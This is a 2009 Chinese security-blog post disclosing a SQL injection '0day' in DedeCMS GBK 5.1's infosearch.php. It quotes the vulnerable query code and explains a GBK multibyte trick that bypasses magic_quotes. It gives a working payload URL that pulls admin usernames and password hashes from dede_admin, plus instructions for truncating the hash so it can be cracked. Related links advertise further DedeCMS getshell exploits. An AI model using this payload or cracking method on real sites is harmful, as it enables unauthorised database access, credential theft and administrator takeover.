dedecms GBK 5.1 搜索型注射0day

2009, October 28, 2:51 PM. 漏洞集研
Submitted by admin
漏洞发掘: 大伟 & char 银河安全网 www.yhsafe.com

漏洞地址:/plus/infosearch.php
漏洞成因:
$q = trim($q);
if($areaid > 0) {
$wheresql = "areaid=$areaid and ";
}
$query = "select ID,typeid,title,memberID,writer,senddate from #@__infos where $wheresql title like '%$q%' order by senddate desc";
获得变量q,直接放入数据库查询.导致注入产生,这样一个搜索型的注入,本身对于php环境如果设置了magic_quote_gpc=on的话,利用起来是很难的.但是可以结合php多字节编码漏洞,这样,一个相对来说不错的利用方式产生了.可以如下构造,通过get方式提交.

利用地址:
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

补充:dedecms暴出来的管理员密码只有24位,这里我简单的来说一下,dedecms首先获得某密码的32位MD5加密值,然后去掉后面8位,这样,拿剩下的24位来做为密码的加密值.这里我们可以想到,32位转16位可以把32位的前8位和后8位去掉,剩下的中间就是其16位的加密值,于是,我们可以把dedecms中暴出来的那窜24位加密值的前8位去掉,剩下的16位就可以拿去破解了

Tags: dedecms

« 上一篇 | 下一篇 »

只显示10条记录相关文章
DeDecms xss 通杀0day 附getshell EXP (浏览: 27592, 评论: 0)
“幸福百相园”相册GETSHELL漏洞 (浏览: 35214, 评论: 0)
dedecms默认的注册用户 (浏览: 12777, 评论: 0)
dede织梦的又一个代码执行0day (浏览: 13488, 评论: 0)
分享一个判断dedecms版本的方法 (浏览: 16159, 评论: 0)
dedecms v5.3-v5.6 Get Shell 0day利用分析 (浏览: 37386, 评论: 0)
DEDE 暴文件源码AND获得后门GetShell漏洞 (浏览: 21922, 评论: 0)
dedecms 5.6 RSS订阅页面注入漏洞 (浏览: 10944, 评论: 0)
这难道就是传说中的:dedecms 5.6的最新注入漏洞 (浏览: 10071, 评论: 0)
DedeCmsV5.6 本地包含 鸡助0day (浏览: 17888, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):